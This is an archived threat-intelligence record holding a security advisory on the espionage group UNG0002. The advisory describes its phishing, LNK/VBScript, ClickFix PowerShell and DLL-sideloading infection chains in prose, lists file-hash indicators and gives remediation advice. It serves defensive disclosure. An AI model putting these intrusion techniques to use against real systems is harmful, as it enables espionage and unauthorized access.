{ "id": "975be886-7b85-4711-b324-583e2928575f", "created_at": "2026-04-06T00:16:46.555608Z", "updated_at": "2026-04-10T03:28:40.150447Z", "deleted_at": null, "sha1_hash": "e7de273bb8909c7ebc218f095072d305af6fc4bb", "title": "APT UNG0002 Expands Cyber Espionage Campaigns Across Asia - Active IOCs - Rewterz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 262540, "plain_text": "APT UNG0002 Expands Cyber Espionage Campaigns Across Asia\r\n- Active IOCs - Rewterz\r\nPublished: 2025-07-23 · Archived: 2026-04-02 12:33:25 UTC\r\nSeverity\r\nHigh\r\nAnalysis Summary\r\nCyber espionage in Asia is intensifying as researchers from a security firm have revealed new details on\r\nUNG0002, also known as Unknown Group 0002. This technically adept yet obscure group is conducting large-scale campaigns targeting strategic sectors across China, Hong Kong, and Pakistan. Its focus spans defense,\r\nelectrical engineering, energy infrastructure, civil aviation, healthcare, universities, IT enterprises, and even the\r\nvideo game sector.\r\nAccording to the latest report by the security firm, UNG0002 prefers using LNK shortcuts, VBScript files, and\r\npost-exploitation tools like Cobalt Strike and Metasploit. The group lures victims with deceptive documents\r\ndisguised as résumés, lending authenticity to their phishing attacks. The analysis, conducted by a researcher,\r\nhighlights the group’s methodical approach and adaptability.\r\nUNG0002 has orchestrated two major campaigns: Cobalt Whisper (May–September 2024) and AmberMist\r\n(January–May 2025). Both relied heavily on phishing emails delivering malicious ZIP archives and LNK files to\r\ninitiate complex malware deployment chains.\r\nThe Cobalt Whisper campaign, first identified in October 2024, used ZIP attachments containing LNK and\r\nVBScript files. Once executed, these deployed modules of Cobalt Strike, enabling attackers to maintain command\r\nand control within compromised systems.\r\nIn the AmberMist campaign, attackers distributed fake résumés as LNK files initiating a multi-stage infection\r\nprocess, culminating in the deployment of INET RAT and Blister DLL trojans. INET RAT is believed to be a\r\ncustomized variant of Shadow RAT spyware, while Blister DLL acts as a shellcode loader to establish remote\r\naccess.\r\nhttps://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nPage 1 of 4\n\nA notable attack variant observed in January 2025 redirected victims to a spoofed Pakistan Ministry of Maritime\r\nAffairs website. Masquerading as a CAPTCHA verification page, it executed PowerShell commands via ClickFix\r\nto activate Shadow RAT, establishing covert communication channels with command-and-control servers.\r\nThe malware used, such as Shadow RAT, employs DLL Sideloading and supports remote command execution,\r\nmaking it stealthy and difficult to detect. Despite exposure of its tools, UNG0002 continues refining its toolkit and\r\nexpanding infrastructure.\r\nThough direct attribution remains unconfirmed, circumstantial evidence suggests UNG0002 may originate from\r\nSouth or Southeast Asia. Analysts describe the group as resilient and inventive, highlighting the persistent\r\neffectiveness of phishing, spoofed sites, and DLL Sideloading in strategic cyber espionage campaigns likely to\r\nintensify further.\r\nImpact\r\nCommand Execution\r\nUnauthorized Access\r\nCyber Espionage\r\nIndicators of Compromise\r\nMD5\r\n76c6694bb3446752f305376f212aca32\r\nf5a9c3ec6b00cea79eae2f9b9a808f5f\r\n35fe5143d83829bb574e8021d47187ab\r\na8a7e7494b9ded05685d6b91b1b7ffa6\r\nhttps://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nPage 2 of 4\n\nab5aeb2f25745580b80d7326bcecc620\r\nbba575d4a89f285cf8c0650be09cc12e\r\n7a2b0d8860a7188a936275907785d421\r\na1fdb6d4220598e0f394e0a850343fe9\r\n309f84937dc4e489517f5cbe1193538a\r\n3992f53bb3d217900a56eec7f656b909\r\n35bf8a85d61ec695fcaec19b6e25e1ca\r\n2d2dc4dbefa47b9ac563a0f9fd65929f\r\nSHA-256\r\n4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148\r\n55dc772d1b59c387b5f33428d5167437dc2d6e2423765f4080ee3b6a04947ae9\r\n4b410c47465359ef40d470c9286fb980e656698c4ee4d969c86c84fbd012af0d\r\nc49e9b556d271a853449ec915e4a929f5fa7ae04da4dc714c220ed0d703a36f7\r\nad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850\r\nc722651d72c47e224007c2111e0489a028521ccdf5331c92e6cd9cfe07076918\r\n2140adec9cde046b35634e93b83da4cc9a8aa0a71c21e32ba1dce2742314e8dc\r\n2c700126b22ea8b22b8b05c2da05de79df4ab7db9f88267316530fa662b4db2c\r\nc3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6\r\n4c79934beb1ea19f17e39fd1946158d3dd7d075aa29d8cd259834f8cd7e04ef8\r\n2bdd086a5fce1f32ea41be86febfb4be7782c997cfcb028d2f58fee5dd4b0f8a\r\n90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99\r\nSHA1\r\nab774153c0fe0e968f57df3bdc209612056b0ad4\r\n302bebfa44e4c04baab423ac798997fb87b8d1a2\r\nbf5b9e0c4f2497a0e501dba361c94a5e401ad135\r\ne28ff664767b55373f43c909cab287b471b5a9dd\r\nbf76ae47197bd947c2d7e582aa2a565ad6beaed2\r\na42dfab48fb50fed3a560f0e272d5aa49a09d2b2\r\nfee6bab9751d24a3f0171c6c72c67010d262adf3\r\n98ea070e684ce6e8fea1ee60a1dc9a7115187826\r\n87df9a5dcf7d18816eadff78aff242f0cc7a04cc\r\na9ad4f730cc37aeef7c0368638e7e732f13bfa31\r\n98008af4ab20fbc6234af6bf9b27d698accca4d4\r\n23382a69715a8e597d7ff605b9e41ef0f64b9897\r\nRemediation\r\nUpdate and patch systems regularly to close vulnerabilities exploited by tools like Cobalt Strike and\r\nMetasploit\r\nhttps://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nPage 3 of 4\n\nImplement strong email security gateways to detect and block phishing emails with malicious ZIP or LNK\r\nattachments\r\nTrain employees to identify deceptive résumés and suspicious email attachments to reduce phishing\r\nsuccess\r\nRestrict execution of LNK, VBScript, and PowerShell files through endpoint protection policies\r\nMonitor network traffic for connections to known C2 infrastructures and unusual beaconing behaviour\r\nDeploy endpoint detection and response (EDR) solutions to detect post-exploitation tools and RAT activity\r\nUse application whitelisting to prevent unauthorized scripts and shellcode loaders from executing\r\nRegularly review and harden web infrastructure to prevent spoofing or redirection attacks\r\nEnable multi-factor authentication to reduce the impact of compromised credentials\r\nConduct threat hunting focused on DLL Sideloading and living-off-the-land techniques used by UNG0002\r\nSource: https://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nhttps://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs" ], "report_names": [ "apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fa8f111a-5ace-4234-a4f7-07ce2b429606", "created_at": "2026-02-07T02:00:03.663624Z", "updated_at": "2026-04-10T02:00:03.960722Z", "deleted_at": null, "main_name": "UNG0002", "aliases": [], "source_name": "MISPGALAXY:UNG0002", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434606, "ts_updated_at": 1775791720, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.pdf", "text": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.txt", "img": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.jpg" } }